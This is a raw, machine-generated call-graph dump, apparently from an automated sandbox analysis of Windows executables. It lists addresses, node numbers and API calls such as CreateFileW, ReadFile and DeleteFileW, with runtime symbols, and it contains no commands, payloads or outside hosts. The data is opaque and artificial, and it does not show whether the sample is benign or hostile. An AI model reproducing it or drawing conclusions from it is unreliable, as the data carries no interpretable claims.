7ffdfabed4df 68309->68315 68317 7ffdfabf41f0 95 API calls 68309->68317 68780 7ffdfabf5340 68309->68780 68792 7ffdfaba8f80 68309->68792 68816 7ffdfabaa060 19 API calls 68309->68816 68817 7ffdfaba14a0 19 API calls 68309->68817 68818 7ffdfaba59f0 86 API calls 68309->68818 68820 7ffdfaba59f0 86 API calls 68310->68820 68311->68303 68819 7ffdfab76c20 16 API calls 68315->68819 68317->68309 68318->68244 68319->68239 68320->68230 68321->68218 68322->68217 68324 7ffdfaca2bc9 68323->68324 68325 7ffdfabf499b 68324->68325 68326 7ffdfaca2c14 IsProcessorFeaturePresent 68324->68326 68325->68213 68327 7ffdfaca2c2c 68326->68327 68858 7ffdfaca2e0c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 68327->68858 68329 7ffdfaca2c3f 68859 7ffdfaca2be0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 68329->68859 68333 7ffdfabf4e63 68332->68333 68334 7ffdfabf4e7f 68333->68334 68345 7ffdfabf4e9d 68333->68345 68410 7ffdfab7a490 16 API calls 68334->68410 68337 7ffdfabf505b 68392 7ffdfac2fe10 68337->68392 68338 7ffdfabf5316 68342 7ffdfaca2bc0 8 API calls 68338->68342 68339 7ffdfabf4fca 68343 7ffdfabf4ffb 68339->68343 68344 7ffdfabf4fd3 68339->68344 68340 7ffdfabf4f97 68340->68337 68340->68339 68346 7ffdfabf4302 68342->68346 68349 7ffdfab76860 16 API calls 68343->68349 68352 7ffdfabf5034 68343->68352 68412 7ffdfab7a300 20 API calls 68344->68412 68345->68340 68354 7ffdfabf4f72 68345->68354 68346->68258 68346->68263 68346->68264 68348 7ffdfabf4e90 68418 7ffdfabf4ae0 17 API calls 68348->68418 68350 7ffdfabf500c 68349->68350 68351 7ffdfabf5014 memcpy 68350->68351 68350->68352 68353 7ffdfac2fe10 17 API calls 68351->68353 68357 7ffdfab76860 16 API calls 68352->68357 68364 7ffdfabf50da 68352->68364 68353->68352 68411 7ffdfab7a300 20 API calls 68354->68411 68356 7ffdfabf5245 68356->68348 68417 7ffdfab7a300 20 API calls 68356->68417 68360 7ffdfabf50bd 68357->68360 68361 7ffdfabf50c5 memcpy 68360->68361 68360->68364 68361->68364 68362 7ffdfabf50ee 68362->68356 68416 7ffdfaba59f0 86 API calls 68362->68416 68363 7ffdfab93750 65 API calls 68363->68364 68364->68348 68364->68362 68364->68363 68413 7ffdfab76c20 16 API calls 68364->68413 68414 7ffdfabd1350 18 API calls 68364->68414 68415 7ffdfab94b40 69 API calls 68364->68415 68368->68251 68369->68255 68370->68258 68371->68274 68372->68258 68373->68265 68374->68273 68376 7ffdfaba5979 68375->68376 68377 7ffdfaba597e 68375->68377 68458 7ffdfaba54b0 82 API calls 68376->68458 68379 7ffdfaba5998 68377->68379 68459 7ffdfaba5860 20 API calls 68377->68459 68379->68272 68382 7ffdfac32484 68381->68382 68388 7ffdfac32688 68381->68388 68382->68388 68460 7ffdfac32870 68382->68460 68384 7ffdfac32531 68389 7ffdfac32548 68384->68389 68474 7ffdfabdb0f0 memset 68384->68474 68387 7ffdfac324d9 68387->68384 68466 7ffdfab92b70 68387->68466 68388->68277 68389->68388 68390 7ffdfabd1810 17 API calls 68389->68390 68390->68389 68391->68266 68395 7ffdfac2fe61 68392->68395 68394 7ffdfac30280 68430 7ffdfab79330 16 API calls 68394->68430 68397 7ffdfac30229 68395->68397 68399 7ffdfac3016e 68395->68399 68419 7ffdfac2f280 68395->68419 68429 7ffdfab7a490 16 API calls 68397->68429 68398 7ffdfac3029d 68405 7ffdfac3033e 68398->68405 68431 7ffdfabd1810 68398->68431 68399->68394 68399->68398 68401 7ffdfab79160 16 API calls 68399->68401 68401->68394 68402 7ffdfac30397 68403 7ffdfaca2bc0 8 API calls 68402->68403 68406 7ffdfac303e0 68403->68406 68405->68402 68446 7ffdfac05ec0 17 API calls 68405->68446 68406->68352 68408 7ffdfac30365 68408->68402 68447 7ffdfabbd1c0 17 API calls 68408->68447 68410->68348 68411->68348 68412->68348 68413->68364 68414->68364 68415->68364 68416->68356 68417->68348 68418->68338 68423 7ffdfac2f2c3 68419->68423 68420 7ffdfac2f39b 68428 7ffdfac2f3b9 68420->68428 68448 7ffdfac2c450 16 API calls 68420->68448 68421 7ffdfac2f3dd 68424 7ffdfac2f410 68421->68424 68425 7ffdfac2f423 68421->68425 68421->68428 68423->68420 68423->68421 68449 7ffdfab7a490 16 API calls 68424->68449 68450 7ffdfab7a490 16 API calls 68425->68450 68428->68395 68429->68399 68430->68398 68432 7ffdfabd18c8 68431->68432 68442 7ffdfabd183c 68431->68442 68433 7ffdfabd18e0 68432->68433 68434 7ffdfabd18d0 68432->68434 68441 7ffdfabd18db 68433->68441 68455 7ffdfabf5ae0 17 API calls 68433->68455 68454 7ffdfabe6990 17 API calls 68434->68454 68456 7ffdfabd16a0 17 API calls 68441->68456 68442->68432 68451 7ffdfab7c9a0 17 API calls new[] 68442->68451 68452 7ffdfabbd1c0 17 API calls 68442->68452 68453 7ffdfabbe850 17 API calls 68442->68453 68443 7ffdfabd199a 68444 7ffdfabd19db 68443->68444 68457 7ffdfabbe850 17 API calls 68443->68457 68446->68408 68447->68402 68448->68428 68449->68428 68450->68428 68451->68442 68452->68442 68453->68442 68454->68441 68455->68441 68456->68443 68457->68444 68458->68377 68459->68379 68461 7ffdfac3289f 68460->68461 68463 7ffdfac3290f 68461->68463 68483 7ffdfab94cb0 68461->68483 68465 7ffdfac32974 68463->68465 68495 7ffdfabd13e0 18 API calls 68463->68495 68465->68387 68467 7ffdfab92b88 68466->68467 68468 7ffdfab94cb0 54 API calls 68467->68468 68471 7ffdfab92ba3 68468->68471 68470 7ffdfab92c75 68472 7ffdfab92c89 68470->68472 68473 7ffdfabdb0f0 18 API calls 68470->68473 68471->68472 68505 7ffdfab889c0 68471->68505 68472->68387 68473->68472 68482 7ffdfabdb184 68474->68482 68476 7ffdfabdb440 68477 7ffdfabdb4aa 68476->68477 68478 7ffdfabd1810 17 API calls 68476->68478 68479 7ffdfaca2bc0 8 API calls 68477->68479 68478->68476 68481 7ffdfabdb4fa 68479->68481 68481->68389 68482->68476 68552 7ffdfac05ec0 17 API calls 68482->68552 68553 7ffdfabbd1c0 17 API calls 68482->68553 68484 7ffdfab94cd7 68483->68484 68487 7ffdfab94cfc 68484->68487 68500 7ffdfab90200 41 API calls 68484->68500 68488 7ffdfab94d20 68487->68488 68501 7ffdfab94ba0 41 API calls 68487->68501 68492 7ffdfab94dbc 68488->68492 68502 7ffdfab8b170 50 API calls 68488->68502 68491 7ffdfab94dd9 68491->68461 68496 7ffdfab94860 68492->68496 68493 7ffdfab94d37 68493->68492 68503 7ffdfab87220 50 API calls 68493->68503 68495->68465 68498 7ffdfab9488d 68496->68498 68497 7ffdfab9489a 68497->68491 68498->68497 68504 7ffdfab87220 50 API calls 68498->68504 68500->68487 68501->68488 68502->68493 68503->68492 68504->68497 68507 7ffdfab889f3 68505->68507 68516 7ffdfab8de60 68507->68516 68511 7ffdfab88b04 68528 7ffdfab86c40 memset 68511->68528 68514 7ffdfab88b0e 68529 7ffdfab87220 50 API calls 68514->68529 68515 7ffdfab88b0c 68515->68470 68517 7ffdfab8de8f 68516->68517 68520 7ffdfab88abc 68516->68520 68519 7ffdfab8df44 68517->68519 68542 7ffdfab8fb40 47 API calls 68517->68542 68519->68520 68530 7ffdfab80610 68519->68530 68524 7ffdfab84250 68520->68524 68521 7ffdfab8defd 68521->68519 68543 7ffdfab8d900 16 API calls 68521->68543 68525 7ffdfab84368 68524->68525 68526 7ffdfab84275 68524->68526 68525->68511 68525->68514 68526->68525 68527 7ffdfab84351 memset 68526->68527 68527->68525 68528->68515 68529->68515 68544 7ffdfab7cfb0 68530->68544 68532 7ffdfab80633 68533 7ffdfab80645 GetFileAttributesW 68532->68533 68541 7ffdfab8063b 68532->68541 68534 7ffdfab806cc 68533->68534 68540 7ffdfab8065d 68533->68540 68536 7ffdfab806dc 68534->68536 68537 7ffdfab806fe 68534->68537 68535 7ffdfab8066e DeleteFileW 68535->68537 68535->68540 68550 7ffdfab7d7a0 21 API calls 68536->68550 68537->68541 68551 7ffdfab79330 16 API calls 68537->68551 68540->68534 68540->68535 68540->68536 68541->68520 68542->68521 68543->68519 68545 7ffdfab7cfee 68544->68545 68546 7ffdfab7d037 68545->68546 68547 7ffdfab76160 new[] 16 API calls 68545->68547 68546->68532 68548 7ffdfab7d003 68547->68548 68548->68546 68549 7ffdfab7d00b memset 68548->68549 68549->68546 68550->68541 68551->68541 68552->68482 68553->68482 68572 7ffdfab89cb0 68554->68572 68557 7ffdfab9351d 68562 7ffdfab93464 68557->68562 68624 7ffdfab87220 50 API calls 68557->68624 68561 7ffdfab93453 68561->68557 68561->68562 68563 7ffdfab934fb 68561->68563 68565 7ffdfab934c9 68561->68565 68562->68283 68563->68557 68623 7ffdfac35c30 16 API calls 68563->68623 68619 7ffdfab887e0 68565->68619 68568->68283 68569->68283 68570->68283 68571->68280 68573 7ffdfab89f69 68572->68573 68579 7ffdfab89ce0 68572->68579 68574 7ffdfab8a00e 68573->68574 68638 7ffdfab8ebe0 68573->68638 68593 7ffdfab89d7e 68574->68593 68646 7ffdfab86c40 memset 68574->68646 68577 7ffdfaca2bc0 8 API calls 68578 7ffdfab8a069 68577->68578 68578->68562 68596 7ffdfab8a080 68578->68596 68579->68573 68579->68574 68580 7ffdfab89ea8 68579->68580 68582 7ffdfab89d71 68579->68582 68586 7ffdfab89d83 68579->68586 68585 7ffdfab89ecf 68580->68585 68625 7ffdfab7d970 68580->68625 68581 7ffdfab84250 memset 68581->68574 68642 7ffdfab86c40 memset 68582->68642 68583 7ffdfab89fcf 68583->68574 68583->68581 68583->68583 68585->68573 68585->68574 68591 7ffdfab8b980 28 API calls 68585->68591 68586->68574 68589 7ffdfab89e32 68586->68589 68643 7ffdfac35c70 16 API calls 68586->68643 68587 7ffdfab89e75 68587->68580 68588 7ffdfab89e94 68587->68588 68645 7ffdfab86c40 memset 68588->68645 68589->68587 68589->68588 68644 7ffdfab87c40 23 API calls 68589->68644 68591->68573 68593->68577 68597 7ffdfab8a0a2 68596->68597 68599 7ffdfab8a0d5 68596->68599 68720 7ffdfab79330 16 API calls 68597->68720 68601 7ffdfab8a0ce 68599->68601 68602 7ffdfab8a1f8 68599->68602 68603 7ffdfab8a250 68599->68603 68606 7ffdfab8a10d 68599->68606 68601->68557 68601->68561 68601->68562 68615 7ffdfab8b980 68601->68615 68721 7ffdfab79330 16 API calls 68602->68721 68605 7ffdfab8a27e 68603->68605 68608 7ffdfab8a268 68603->68608 68605->68606 68611 7ffdfab8a29a 68605->68611 68606->68601 68722 7ffdfab87220 50 API calls 68606->68722 68607 7ffdfab8a2d5 memset 68607->68601 68714 7ffdfab88000 68608->68714 68610 7ffdfab8a2bd 68724 7ffdfab868e0 20 API calls new[] 68610->68724 68611->68607 68611->68610 68723 7ffdfab83330 18 API calls new[] 68611->68723 68614 7ffdfab8a2c7 68614->68607 68617 7ffdfab8b995 68615->68617 68618 7ffdfab8b9de 68615->68618 68617->68618 68726 7ffdfab8b910 68617->68726 68618->68561 68621 7ffdfab88809 68619->68621 68620 7ffdfab88857 68620->68562 68621->68620 68755 7ffdfab84560 16 API calls new[] 68621->68755 68623->68557 68624->68562 68626 7ffdfab7d99d 68625->68626 68633 7ffdfab7d9eb 68625->68633 68628 7ffdfab7d9d4 memcpy 68626->68628 68629 7ffdfab7d9b4 memcpy 68626->68629 68627 7ffdfab7da14 ReadFile 68630 7ffdfab7daaa 68627->68630 68627->68633 68628->68633 68637 7ffdfab7d9b9 68629->68637 68631 7ffdfab7dada 68630->68631 68648 7ffdfab79330 16 API calls 68630->68648 68634 7ffdfab7dae9 memset 68631->68634 68631->68637 68633->68627 68633->68630 68635 7ffdfab7da84 68633->68635 68634->68637 68647 7ffdfab7d7a0 21 API calls 68635->68647 68637->68585 68640 7ffdfab8ec00 68638->68640 68641 7ffdfab8ec18 68640->68641 68649 7ffdfab8e800 68640->68649 68641->68583 68642->68593 68643->68589 68644->68587 68645->68593 68646->68593 68647->68637 68648->68631 68650 7ffdfab8e83e 68649->68650 68651 7ffdfab8e8f0 68650->68651 68652 7ffdfab8e880 68650->68652 68668 7ffdfab8e846 68650->68668 68673 7ffdfab8e230 68650->68673 68691 7ffdfab8bb20 68651->68691 68652->68651 68655 7ffdfab8e8e0 68652->68655 68652->68668 68690 7ffdfab8e480 17 API calls new[] 68655->68690 68656 7ffdfaca2bc0 8 API calls 68660 7ffdfab8ebd1 68656->68660 68658 7ffdfab8bb20 9 API calls 68661 7ffdfab8e90f 68658->68661 68660->68640 68662 7ffdfab8e980 68661->68662 68664 7ffdfab8e93e 68661->68664 68663 7ffdfab8e9d3 RaiseException 68662->68663 68666 7ffdfab8ea20 68662->68666 68662->68668 68663->68662 68665 7ffdfab8bb20 9 API calls 68664->68665 68667 7ffdfab8e943 memcmp 68665->68667 68666->68668 68669 7ffdfab8bb20 9 API calls 68666->68669 68667->68668 68668->68656 68670 7ffdfab8eb3f 68669->68670 68670->68668 68671 7ffdfab8bb20 9 API calls 68670->68671 68672 7ffdfab8eb60 memcmp 68671->68672 68672->68668 68674 7ffdfab8bb20 9 API calls 68673->68674 68675 7ffdfab8e244 68674->68675 68677 7ffdfab8e25b 68675->68677 68697 7ffdfab8bb90 68675->68697 68679 7ffdfab8e2a6 68677->68679 68686 7ffdfab8e444 68677->68686 68710 7ffdfab8e090 11 API calls 68677->68710 68680 7ffdfab8bb20 9 API calls 68679->68680 68681 7ffdfab8e2c8 68679->68681 68682 7ffdfab8e389 68680->68682 68681->68686 68713 7ffdfab79330 16 API calls 68681->68713 68684 7ffdfab8e399 68682->68684 68685 7ffdfab8bb90 36 API calls 68682->68685 68684->68681 68711 7ffdfab8e090 11 API calls 68684->68711 68685->68684 68686->68652 68688 7ffdfab8e3bd 68688->68681 68712 7ffdfab8c330 39 API calls new[] 68688->68712 68690->68668 68692 7ffdfab8bb3f 68691->68692 68693 7ffdfab8bb4a RaiseException 68692->68693 68694 7ffdfab8bb7b 68692->68694 68693->68694 68695 7ffdfaca2bc0 8 API calls 68694->68695 68696 7ffdfab8bb88 68695->68696 68696->68658 68698 7ffdfab8bbb6 68697->68698 68699 7ffdfab8bc02 68697->68699 68700 7ffdfab765b0 16 API calls 68698->68700 68701 7ffdfab8bc08 68699->68701 68702 7ffdfab8bc4e 68699->68702 68703 7ffdfab8bbca 68700->68703 68704 7ffdfab76160 new[] 16 API calls 68701->68704 68709 7ffdfab7f3a0 34 API calls 68702->68709 68705 7ffdfab8bbde memset 68703->68705 68706 7ffdfab8bbd2 68703->68706 68707 7ffdfab8bc12 68704->68707 68705->68699 68706->68677 68707->68706 68708 7ffdfab8bc1a memset 68707->68708 68708->68706 68709->68706 68710->68679 68711->68688 68712->68681 68713->68686 68715 7ffdfab8802f 68714->68715 68716 7ffdfab8803c 68714->68716 68725 7ffdfab8ef40 37 API calls 68715->68725 68718 7ffdfab8804c 68716->68718 68719 7ffdfab7d970 25 API calls 68716->68719 68718->68606 68719->68718 68720->68601 68721->68606 68722->68601 68723->68610 68724->68614 68725->68716 68727 7ffdfab8b923 68726->68727 68729 7ffdfab8b95e 68727->68729 68730 7ffdfab8ca40 68727->68730 68729->68618 68731 7ffdfab76160 new[] 16 API calls 68730->68731 68732 7ffdfab8ca86 68731->68732 68733 7ffdfab8ca92 memset 68732->68733 68734 7ffdfab8cb00 68732->68734 68736 7ffdfab7ff80 68733->68736 68734->68729 68744 7ffdfab7ffd1 68736->68744 68737 7ffdfab7cfb0 17 API calls 68737->68744 68739 7ffdfaca2bc0 8 API calls 68740 7ffdfab805f7 68739->68740 68740->68734 68741 7ffdfab801a0 CreateFileW 68741->68744 68744->68737 68744->68741 68745 7ffdfab80425 68744->68745 68747 7ffdfab80358 68744->68747 68750 7ffdfab7f9a0 25 API calls new[] 68744->68750 68751 7ffdfab807b0 22 API calls 68744->68751 68752 7ffdfab79330 16 API calls 68744->68752 68753 7ffdfab7d7a0 21 API calls 68745->68753 68747->68739 68748 7ffdfab80450 68754 7ffdfac35c70 16 API calls 68748->68754 68750->68744 68751->68744 68752->68744 68753->68748 68754->68747 68755->68620 68765 7ffdfab76ea0 68756->68765 68758 7ffdfab79116 68759 7ffdfab7912f 68758->68759 68777 7ffdfab76c20 16 API calls 68758->68777 68761 7ffdfaca2bc0 8 API calls 68759->68761 68764 7ffdfab79142 68761->68764 68764->68290 68766 7ffdfab76ee9 68765->68766 68770 7ffdfab785f6 68766->68770 68771 7ffdfab76f73 68766->68771 68772 7ffdfab76f63 68766->68772 68775 7ffdfab76f71 68766->68775 68767 7ffdfaca2bc0 8 API calls 68768 7ffdfab78633 68767->68768 68768->68758 68776 7ffdfab78cb0 16 API calls new[] 68768->68776 68770->68767 68774 7ffdfab76f77 memcpy 68771->68774 68771->68775 68778 7ffdfab78be0 16 API calls 68772->68778 68774->68775 68775->68770 68779 7ffdfab78be0 16 API calls 68775->68779 68776->68758 68777->68759 68778->68775 68779->68770 68781 7ffdfabf5378 68780->68781 68782 7ffdfabf53ce 68780->68782 68822 7ffdfab79330 16 API calls 68781->68822 68782->68781 68783 7ffdfabf53f0 68782->68783 68784 7ffdfabf5390 68783->68784 68790 7ffdfabf53f5 68783->68790 68823 7ffdfab79330 16 API calls 68784->68823 68787 7ffdfabf53ba 68787->68309 68788 7ffdfabf4d90 94 API calls 68788->68790 68789 7ffdfabf54ed 68789->68309 68790->68788 68790->68789 68791 7ffdfabdb0f0 18 API calls 68790->68791 68791->68790 68793 7ffdfaba8fa7 68792->68793 68794 7ffdfaba8f94 68792->68794 68796 7ffdfaba8fbd 68793->68796 68840 7ffdfab79330 16 API calls 68793->68840 68839 7ffdfab79330 16 API calls 68794->68839 68797 7ffdfaba8fa5 68796->68797 68799 7ffdfaba9001 68796->68799 68841 7ffdfab79330 16 API calls 68797->68841 68824 7ffdfaba8cf0 68799->68824 68802 7ffdfaba8ff4 68802->68309 68805 7ffdfaba9086 68810 7ffdfaba9092 68805->68810 68844 7ffdfaba14a0 19 API calls 68805->68844 68806 7ffdfaba9025 68806->68805 68808 7ffdfaba8cf0 86 API calls 68806->68808 68809 7ffdfaba9081 68806->68809 68842 7ffdfabf5560 94 API calls 68806->68842 68843 7ffdfaba7e60 86 API calls 68806->68843 68808->68806 68809->68309 68810->68809 68811 7ffdfab76860 16 API calls 68810->68811 68812 7ffdfaba910b 68811->68812 68812->68809 68813 7ffdfaba9113 memcpy 68812->68813 68813->68809 68814->68294 68815->68297 68816->68309 68817->68309 68818->68309 68819->68296 68820->68296 68821->68305 68822->68784 68823->68787 68825 7ffdfaba8d65 68824->68825 68833 7ffdfaba8d0d 68824->68833 68827 7ffdfaba8de5 68825->68827 68828 7ffdfaba8dde 68825->68828 68826 7ffdfaba8d2c 68826->68825 68832 7ffdfaba8d35 68826->68832 68845 7ffdfababd50 68827->68845 68854 7ffdfaba3e40 20 API calls 68828->68854 68838 7ffdfaba8dfd 68832->68838 68853 7ffdfaba5860 20 API calls 68832->68853 68833->68825 68833->68826 68852 7ffdfaba7e60 86 API calls 68833->68852 68835 7ffdfaba8d56 68835->68806 68836 7ffdfaba8de3 68836->68838 68855 7ffdfaba5860 20 API calls 68836->68855 68838->68806 68839->68797 68840->68796 68841->68802 68842->68806 68843->68806 68844->68810 68846 7ffdfababde6 68845->68846 68851 7ffdfababe6e 68846->68851 68856 7ffdfab76c20 16 API calls 68846->68856 68848 7ffdfabb2498 68857 7ffdfaba1e20 16 API calls 68848->68857 68850 7ffdfabb24a7 68850->68836 68852->68833 68853->68835 68854->68836 68855->68838 68856->68848 68857->68850 68858->68329 68860 7ffdfabafa36 68861 7ffdfabafa69 68860->68861 68862 7ffdfabafa54 68860->68862 68884 7ffdfab95d30 68861->68884 68896 7ffdfabb69a0 31 API calls 68862->68896 68867 7ffdfabb1b0d 68868 7ffdfabafa60 68868->68867 68871 7ffdfabb1f45 68868->68871 68898 7ffdfab79330 16 API calls 68868->68898 68869 7ffdfabb253b 68900 7ffdfab79330 16 API calls 68869->68900 68871->68869 68899 7ffdfaba1e20 16 API calls 68871->68899 68874 7ffdfabb2586 68875 7ffdfabb2597 68874->68875 68901 7ffdfaba54b0 82 API calls 68874->68901 68877 7ffdfabb25a8 68875->68877 68902 7ffdfab76c20 16 API calls 68875->68902 68881 7ffdfabb2054 68877->68881 68903 7ffdfabd1350 18 API calls 68877->68903 68880 7ffdfaca2bc0 8 API calls 68882 7ffdfabb2663 68880->68882 68881->68880 68883 7ffdfabb2087 68881->68883 68886 7ffdfab95e05 68884->68886 68889 7ffdfab95d57 68884->68889 68885 7ffdfab95d5d 68891 7ffdfab95e0a 68885->68891 68892 7ffdfab95ea7 68885->68892 68893 7ffdfab95eb3 68885->68893 68886->68891 68904 7ffdfab91ed0 68886->68904 68888 7ffdfab95edc 68915 7ffdfab79330 16 API calls 68888->68915 68889->68885 68889->68888 68889->68891 68891->68868 68897 7ffdfab95f20 53 API calls 68891->68897 68913 7ffdfac35c30 16 API calls 68892->68913 68914 7ffdfab95b20 53 API calls 68893->68914 68896->68868 68897->68868 68898->68871 68899->68869 68900->68874 68901->68875 68902->68877 68903->68881 68905 7ffdfab91eed 68904->68905 68906 7ffdfab91f34 68904->68906 68916 7ffdfab79330 16 API calls 68905->68916 68912 7ffdfab8a080 53 API calls 68906->68912 68908 7ffdfab91f1e 68908->68889 68909 7ffdfab91f45 68911 7ffdfab91f49 68909->68911 68917 7ffdfab91ba0 16 API calls 68909->68917 68911->68889 68912->68909 68913->68891 68914->68891 68915->68891 68916->68908 68917->68911 68918 7ff62c0f2fe0 68919 7ff62c0f2ff0 68918->68919 68920 7ff62c0f3041 68919->68920 68921 7ff62c0f302b 68919->68921 68923 7ff62c0f3061 68920->68923 68933 7ff62c0f3077 __std_exception_destroy 68920->68933 68980 7ff62c0f2710 54 API calls _log10_special 68921->68980 68981 7ff62c0f2710 54 API calls _log10_special 68923->68981 68925 7ff62c0fc550 _log10_special 8 API calls 68926 7ff62c0f31fa 68925->68926 68928 7ff62c0f3349 68988 7ff62c0f2710 54 API calls _log10_special 68928->68988 68931 7ff62c0f3333 68987 7ff62c0f2710 54 API calls _log10_special 68931->68987 68933->68928 68933->68931 68934 7ff62c0f330d 68933->68934 68936 7ff62c0f3207 68933->68936 68945 7ff62c0f3037 __std_exception_destroy 68933->68945 68946 7ff62c0f1470 68933->68946 68976 7ff62c0f1c80 68933->68976 68986 7ff62c0f2710 54 API calls _log10_special 68934->68986 68937 7ff62c0f3273 68936->68937 68982 7ff62c10a404 37 API calls 2 library calls 68936->68982 68939 7ff62c0f3290 68937->68939 68940 7ff62c0f329e 68937->68940 68983 7ff62c10a404 37 API calls 2 library calls 68939->68983 68984 7ff62c0f2dd0 37 API calls 68940->68984 68943 7ff62c0f329c 68985 7ff62c0f2500 54 API calls __std_exception_destroy 68943->68985 68945->68925 68989 7ff62c0f45c0 68946->68989 68949 7ff62c0f14bc 68999 7ff62c1006d4 68949->68999 68950 7ff62c0f149b 69029 7ff62c0f2710 54 API calls _log10_special 68950->69029 68953 7ff62c0f14ab 68953->68933 68954 7ff62c0f14d1 68955 7ff62c0f14d5 68954->68955 68956 7ff62c0f14f8 68954->68956 69030 7ff62c104f08 11 API calls _get_daylight 68955->69030 68960 7ff62c0f1532 68956->68960 68961 7ff62c0f1508 68956->68961 68958 7ff62c0f14da 69031 7ff62c0f2910 54 API calls _log10_special 68958->69031 68963 7ff62c0f154b 68960->68963 68964 7ff62c0f1538 68960->68964 69032 7ff62c104f08 11 API calls _get_daylight 68961->69032 68971 7ff62c0f15d6 68963->68971 68975 7ff62c0f14f3 __std_exception_destroy 68963->68975 69034 7ff62c10039c 68963->69034 69003 7ff62c0f1210 68964->69003 68965 7ff62c0f1510 69033 7ff62c0f2910 54 API calls _log10_special 68965->69033 68970 7ff62c0f15c4 68970->68933 69037 7ff62c104f08 11 API calls _get_daylight 68971->69037 68973 7ff62c0f15db 69038 7ff62c0f2910 54 API calls _log10_special 68973->69038 69025 7ff62c10004c 68975->69025 68977 7ff62c0f1ca5 68976->68977 69282 7ff62c104984 68977->69282 68980->68945 68981->68945 68982->68937 68983->68943 68984->68943 68985->68945 68986->68945 68987->68945 68988->68945 68990 7ff62c0f45cc 68989->68990 69039 7ff62c0f9390 68990->69039 68992 7ff62c0f45f4 68993 7ff62c0f9390 2 API calls 68992->68993 68994 7ff62c0f4607 68993->68994 69044 7ff62c105f94 68994->69044 68997 7ff62c0fc550 _log10_special 8 API calls 68998 7ff62c0f1493 68997->68998 68998->68949 68998->68950 69000 7ff62c100704 68999->69000 69215 7ff62c100464 69000->69215 69002 7ff62c10071d 69002->68954 69004 7ff62c0f1268 69003->69004 69005 7ff62c0f126f 69004->69005 69006 7ff62c0f1297 69004->69006 69232 7ff62c0f2710 54 API calls _log10_special 69005->69232 69009 7ff62c0f12d4 69006->69009 69010 7ff62c0f12b1 69006->69010 69008 7ff62c0f1282 69008->68975 69013 7ff62c0f12e6 69009->69013 69023 7ff62c0f1309 memcpy_s 69009->69023 69233 7ff62c104f08 11 API calls _get_daylight 69010->69233 69012 7ff62c0f12b6 69234 7ff62c0f2910 54 API calls _log10_special 69012->69234 69235 7ff62c104f08 11 API calls _get_daylight 69013->69235 69016 7ff62c0f12eb 69236 7ff62c0f2910 54 API calls _log10_special 69016->69236 69017 7ff62c10039c _fread_nolock 53 API calls 69017->69023 69019 7ff62c0f12cf __std_exception_destroy 69019->68975 69020 7ff62c0f13cf 69237 7ff62c0f2710 54 API calls _log10_special 69020->69237 69023->69017 69023->69019 69023->69020 69024 7ff62c100110 37 API calls 69023->69024 69228 7ff62c100adc 69023->69228 69024->69023 69026 7ff62c10007c 69025->69026 69254 7ff62c0ffe28 69026->69254 69028 7ff62c100095 69028->68970 69029->68953 69030->68958 69031->68975 69032->68965 69033->68975 69266 7ff62c1003bc 69034->69266 69037->68973 69038->68975 69040 7ff62c0f93b2 MultiByteToWideChar 69039->69040 69041 7ff62c0f93d6 69039->69041 69040->69041 69043 7ff62c0f93ec __std_exception_destroy 69040->69043 69042 7ff62c0f93f3 MultiByteToWideChar 69041->69042 69041->69043 69042->69043 69043->68992 69047 7ff62c105ec8 69044->69047 69045 7ff62c105eee 69075 7ff62c104f08 11 API calls _get_daylight 69045->69075 69047->69045 69049 7ff62c105f21 69047->69049 69048 7ff62c105ef3 69076 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69048->69076 69051 7ff62c105f34 69049->69051 69052 7ff62c105f27 69049->69052 69063 7ff62c10ac28 69051->69063 69077 7ff62c104f08 11 API calls _get_daylight 69052->69077 69054 7ff62c0f4616 69054->68997 69057 7ff62c105f55 69070 7ff62c10fecc 69057->69070 69058 7ff62c105f48 69078 7ff62c104f08 11 API calls _get_daylight 69058->69078 69061 7ff62c105f68 69079 7ff62c105478 LeaveCriticalSection 69061->69079 69080 7ff62c1102d8 EnterCriticalSection 69063->69080 69065 7ff62c10ac3f 69066 7ff62c10ac9c 19 API calls 69065->69066 69067 7ff62c10ac4a 69066->69067 69068 7ff62c110338 _isindst LeaveCriticalSection 69067->69068 69069 7ff62c105f3e 69068->69069 69069->69057 69069->69058 69081 7ff62c10fbc8 69070->69081 69074 7ff62c10ff26 69074->69061 69075->69048 69076->69054 69077->69054 69078->69054 69082 7ff62c10fc03 __vcrt_FlsAlloc 69081->69082 69091 7ff62c10fdca 69082->69091 69096 7ff62c107a3c 51 API calls 3 library calls 69082->69096 69084 7ff62c10fea1 69100 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69084->69100 69086 7ff62c10fdd3 69086->69074 69093 7ff62c116d54 69086->69093 69088 7ff62c10fe35 69088->69091 69097 7ff62c107a3c 51 API calls 3 library calls 69088->69097 69090 7ff62c10fe54 69090->69091 69098 7ff62c107a3c 51 API calls 3 library calls 69090->69098 69091->69086 69099 7ff62c104f08 11 API calls _get_daylight 69091->69099 69101 7ff62c116354 69093->69101 69096->69088 69097->69090 69098->69091 69099->69084 69100->69086 69102 7ff62c116389 69101->69102 69103 7ff62c11636b 69101->69103 69102->69103 69106 7ff62c1163a5 69102->69106 69155 7ff62c104f08 11 API calls _get_daylight 69103->69155 69105 7ff62c116370 69156 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69105->69156 69112 7ff62c116964 69106->69112 69110 7ff62c11637c 69110->69074 69158 7ff62c116698 69112->69158 69115 7ff62c1169d9 69189 7ff62c104ee8 11 API calls _get_daylight 69115->69189 69116 7ff62c1169f1 69177 7ff62c108520 69116->69177 69119 7ff62c1169de 69190 7ff62c104f08 11 API calls _get_daylight 69119->69190 69127 7ff62c1163d0 69127->69110 69157 7ff62c1084f8 LeaveCriticalSection 69127->69157 69155->69105 69156->69110 69159 7ff62c1166c4 69158->69159 69162 7ff62c1166de 69158->69162 69159->69162 69202 7ff62c104f08 11 API calls _get_daylight 69159->69202 69161 7ff62c1166d3 69203 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69161->69203 69164 7ff62c11675c 69162->69164 69204 7ff62c104f08 11 API calls _get_daylight 69162->69204 69165 7ff62c1167ad 69164->69165 69206 7ff62c104f08 11 API calls _get_daylight 69164->69206 69175 7ff62c11680a 69165->69175 69208 7ff62c109b78 37 API calls 2 library calls 69165->69208 69168 7ff62c116806 69168->69175 69209 7ff62c10a900 IsProcessorFeaturePresent 69168->69209 69169 7ff62c1167a2 69207 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69169->69207 69172 7ff62c116751 69205 7ff62c10a8e0 37 API calls _invalid_parameter_noinfo 69172->69205 69175->69115 69175->69116 